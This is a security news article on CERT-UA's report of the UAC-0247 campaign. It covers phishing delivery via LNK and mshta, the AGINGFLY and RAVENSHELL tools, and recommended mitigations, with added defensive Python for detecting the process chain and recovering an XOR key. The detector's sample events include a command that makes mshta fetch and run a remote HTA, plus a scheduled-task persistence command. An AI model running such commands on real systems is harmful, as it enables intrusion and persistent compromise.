The attackers are not only stealing sensitive data from web browsers and WhatsApp but are also moving quietly through compromised networks to expand their reach.
The campaign begins with a simple but deceptive email. The attacker contacts the target under the cover of a humanitarian aid discussion and asks the recipient to click a link.
To make the link convincing, the attacker either builds a fake website with AI tools or points the victim at a legitimate third-party site that carries a Cross-Site Scripting (XSS) vulnerability, so the URL shows a trusted domain. Once the victim clicks, an archive file downloads to their computer.
The archive contains a shortcut (LNK) file. When the victim opens it, the shortcut invokes mshta.exe, Windows' built-in HTA handler, which fetches and runs a remote HTA file. That HTA displays a decoy form to keep the victim occupied while, in the background, it drops an executable and launches it through a scheduled task.
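The delivery chain above (shortcut, then mshta.exe fetching a remote HTA, then a scheduled task for the dropped executable) leaves a distinctive parent-child pattern in process-creation telemetry. The following is an added detection example, not CERT-UA's or the article's code: it walks Sysmon-style process events, flags mshta.exe launched with a remote http(s) URL, and raises the severity when a schtasks.exe /create appears anywhere in that process's subtree. The event records, field names (pid, ppid, image, cmd), IP address and task name are all constructed for illustration; adapt the field names to your own telemetry.

```python
"""Detect the LNK -> mshta.exe <remote HTA> -> schtasks /create chain.

Added example (not from CERT-UA or the article). Events below are
constructed Sysmon-style process-creation records; field names are
assumptions, not a real schema.
"""
import re
from collections import defaultdict

# mshta.exe handed a remote URL instead of a local .hta file
REMOTE_HTA = re.compile(r"mshta(\.exe)?\b.*\bhttps?://", re.IGNORECASE)
URL = re.compile(r"https?://\S+", re.IGNORECASE)
# scheduled-task persistence created from the command line
TASK_CREATE = re.compile(r"schtasks(\.exe)?\b.*?/create", re.IGNORECASE)

# Constructed sample events (not real telemetry): explorer.exe launches the
# shortcut, which starts mshta.exe with a remote HTA; the HTA then spawns
# schtasks.exe to persist a dropped executable. A local-HTA launch and a
# remote-HTA launch without persistence are included as contrast cases.
EVENTS = [
    {"pid": 100, "ppid": 4,   "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\mshta.exe",
     "cmd": "mshta.exe http://203.0.113.10/form.hta"},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\schtasks.exe",
     "cmd": 'schtasks.exe /create /sc minute /mo 5 /tn "Updater" /tr "C:\\Users\\Public\\svc.exe"'},
    {"pid": 400, "ppid": 100, "image": r"C:\Windows\System32\mshta.exe",
     "cmd": r"mshta.exe C:\Program Files\Vendor\setup.hta"},   # local HTA, not flagged
    {"pid": 500, "ppid": 100, "image": r"C:\Windows\System32\mshta.exe",
     "cmd": "mshta.exe https://198.51.100.7/decoy.hta"},       # remote HTA, no persistence seen
]


def find_remote_hta(events):
    """Return the pids of mshta.exe processes that were given a remote http(s) URL."""
    return {e["pid"] for e in events
            if e["image"].lower().endswith("mshta.exe") and REMOTE_HTA.search(e["cmd"])}


def descendants(events, root_pid):
    """All pids below root_pid in the process tree, following ppid links."""
    children = defaultdict(list)
    for e in events:
        children[e["ppid"]].append(e["pid"])
    seen, stack = set(), [root_pid]
    while stack:
        for child in children[stack.pop()]:
            if child not in seen:
                seen.add(child)
                stack.append(child)
    return seen


def detect_chain(events):
    """One alert per remote-HTA mshta.exe process.

    Severity is 'high' when a schtasks /create is found in that process's
    subtree (the persistence step described in the article), 'medium' otherwise.
    """
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for pid in sorted(find_remote_hta(events)):
        tasks = [by_pid[c]["cmd"] for c in descendants(events, pid)
                 if TASK_CREATE.search(by_pid[c]["cmd"])]
        alerts.append({
            "mshta_pid": pid,
            "parent": by_pid[pid]["ppid"],
            "url": URL.search(by_pid[pid]["cmd"]).group(0),
            "persistence": tasks,
            "severity": "high" if tasks else "medium",
        })
    return alerts


if __name__ == "__main__":
    for alert in detect_chain(EVENTS):
        print(alert)
```

Only the process started from the remote HTA that went on to create a scheduled task scores as high; a remote HTA on its own is still worth a look, because the persistence step may land in a later event or under a different parent than the one modelled here.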
CERT-UA analysts identified and documented this activity as part of an intensified wave of cyberattacks recorded during March and April 2026, noting that the same cluster has also targeted representatives of Ukraine’s Defense Forces and FPV drone operators.
In one confirmed case from March 10, 2026, an archive named “bachu.zip” was distributed through the Signal messenger, posing as an updated version of the “BACHU” software tool used by FPV operators.
Inside, the archive carried a malicious DLL alongside the main executable; when the victim ran that executable it loaded the DLL (DLL side-loading), which launched the AGINGFLY malware.
Across the dozen incidents studied, the tooling shows a consistent pattern of credential theft followed by network reconnaissance.
Attackers used CHROMELEVATOR to pull authentication data and other stored credentials from web browsers, while a separate tool called ZAPIXDESK was used specifically to steal data from the WhatsApp messenger application.
Alongside the theft tools, the attackers used basic subnet scanners and the publicly available RUSTSCAN tool to map out internal networks.
In some cases, the LIGOLO-NG and CHISEL tools were deployed to build hidden network tunnels, and one incident even revealed the use of the XMRIG miner, packaged as a DLL and loaded through a patched version of the legitimate WIREGUARD program.
The core remote access tool used across this campaign is AGINGFLY, written in the C# programming language. It provides the attacker with a full set of remote control capabilities, including command execution, file downloading, screenshot capture, keylogger activation, and in-memory code execution.
What makes AGINGFLY stand out from similar tools is that its command handlers are not built into the malware itself.
Instead, they are downloaded from the command-and-control (C2) server as source code and compiled on the fly inside the infected system.
Communication with the C2 server runs over WebSockets, and all traffic is encrypted with AES-CBC using a static key. Because the key is hard-coded rather than negotiated per session, anyone who extracts it from a sample can decrypt captured traffic, and the key itself is a reliable signature for that build of the malware.
To maintain a persistent foothold, the campaign also uses a PowerShell script named SILENTLOOP, which automatically runs commands, updates its configuration, and retrieves the latest C2 server IP address from a Telegram channel.
If the primary Telegram source fails, SILENTLOOP also supports backup mechanisms to find the C2 address.
The initial access stage uses either a plain TCP reverse shell or RAVENSHELL, which opens a TCP connection to the management server, obfuscates the traffic with a repeating 9-byte XOR key (a lightweight obfuscation rather than real encryption), and executes the operator's commands through CMD.
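A repeating-key XOR like the one described for RAVENSHELL is recoverable by an analyst from a single packet capture: every ciphertext byte leaks key[i mod 9] = ciphertext[i] XOR plaintext[i], so nine bytes of known plaintext (a crib) give the whole key, and a cmd.exe session supplies plenty of predictable text, such as the Windows banner and the prompt. The block below is an added example, not the malware's or CERT-UA's code; the key, the captured bytes, the banner text and the version string are constructed for illustration, and only the property stated in the article (a repeating 9-byte XOR key over a CMD session) is taken from the source.

```python
"""Recover a repeating 9-byte XOR key from a RAVENSHELL-style TCP stream.

Added example, not the malware's or CERT-UA's code. KEY, PLAINTEXT and the
'capture' derived from them are constructed for illustration.
"""
KEY_LEN = 9

# Constructed key and constructed cmd.exe output (banner + one command).
KEY = bytes([0x13, 0x37, 0xC0, 0xDE, 0xAA, 0x55, 0x01, 0x9F, 0x42])
PLAINTEXT = (
    b"Microsoft Windows [Version 10.0.19045.4291]\r\n"
    b"(c) Microsoft Corporation. All rights reserved.\r\n\r\n"
    b"C:\\Users\\victim>whoami\r\n"
)
# The crib: text an analyst can safely assume appears in a fresh cmd.exe session.
CRIB = b"Microsoft Windows [Version"


def xor_stream(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; the same function encrypts and decrypts."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def recover_key(ciphertext: bytes, crib: bytes, offset: int = 0, key_len: int = KEY_LEN) -> bytes:
    """Derive the full key from a crib of at least key_len bytes at `offset`.

    Each known plaintext byte p at stream position pos fixes one key byte:
    key[pos % key_len] = ciphertext[pos] ^ p. A crib of >= key_len bytes
    therefore pins down every key byte.
    """
    if len(crib) < key_len:
        raise ValueError("crib must cover at least one full key period")
    if offset + len(crib) > len(ciphertext):
        raise ValueError("crib does not fit in the ciphertext at that offset")
    key = bytearray(key_len)
    for i, p in enumerate(crib):
        key[(offset + i) % key_len] = ciphertext[offset + i] ^ p
    return bytes(key)


def looks_like_text(data: bytes) -> bool:
    """Sanity check used to confirm a candidate key: decrypted console output
    should be printable ASCII plus CR/LF/TAB."""
    return all(32 <= b < 127 or b in b"\r\n\t" for b in data)


def find_key(ciphertext: bytes, crib: bytes, key_len: int = KEY_LEN):
    """Crib-drag: try every offset, keep the first key whose decryption of the
    whole stream is plausible console text. Returns (offset, key) or None."""
    for offset in range(0, len(ciphertext) - len(crib) + 1):
        candidate = recover_key(ciphertext, crib, offset, key_len)
        if looks_like_text(xor_stream(ciphertext, candidate)):
            return offset, candidate
    return None


# Constructed "capture": what the analyst would see on the wire.
CAPTURE = xor_stream(PLAINTEXT, KEY)

if __name__ == "__main__":
    offset, key = find_key(CAPTURE, CRIB)
    print(f"crib found at offset {offset}, key = {key.hex()}")
    print(xor_stream(CAPTURE, key).decode())
```

Because the key never changes within a session, recovering it once decrypts the entire command channel in both directions, which is why a short repeating XOR should be read as obfuscation for evading simple string matching, not as protection of the operator's traffic.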
CERT-UA recommends that organizations reduce their exposure by restricting the execution of LNK, HTA, and JS files on endpoint systems. Administrators should also limit the use of the legitimate utilities this campaign abuses, namely mshta.exe, powershell.exe, and wscript.exe, to the users and hosts that genuinely need them.
These restrictions can be implemented with controls already built into Windows (application control policies such as AppLocker or Windows Defender Application Control, and Attack Surface Reduction rules) and do not require third-party tools.
The post New UAC-0247 Campaign Steals Browser and WhatsApp Data From Hospitals and Governments appeared first on Cyber Security News.